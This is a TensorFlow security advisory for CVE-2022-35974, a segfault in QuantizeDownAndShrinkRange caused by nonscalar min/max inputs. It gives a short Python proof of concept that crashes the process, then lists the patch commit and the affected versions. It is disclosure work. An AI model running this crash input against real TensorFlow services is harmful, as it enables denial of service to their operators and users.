## TFSA-2022-108: Segfault in `QuantizeDownAndShrinkRange`

### CVE Number
CVE-2022-35974

### Impact
If `QuantizeDownAndShrinkRange` is given nonscalar inputs for `input_min` or `input_max`, it results in a segfault that can be used to trigger a denial of service attack.
```python
import tensorflow as tf

out_type = tf.quint8
input = tf.constant([1], shape=[3], dtype=tf.qint32)
input_min = tf.constant([], shape=[0], dtype=tf.float32)
input_max = tf.constant(-256, shape=[1], dtype=tf.float32)
tf.raw_ops.QuantizeDownAndShrinkRange(input=input, input_min=input_min, input_max=input_max, out_type=out_type)
```

### Patches
We have patched the issue in GitHub commit [73ad1815ebcfeb7c051f9c2f7ab5024380ca8613](https://github.com/tensorflow/tensorflow/commit/73ad1815ebcfeb7c051f9c2f7ab5024380ca8613).

The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.


### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.


### Attribution
This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.
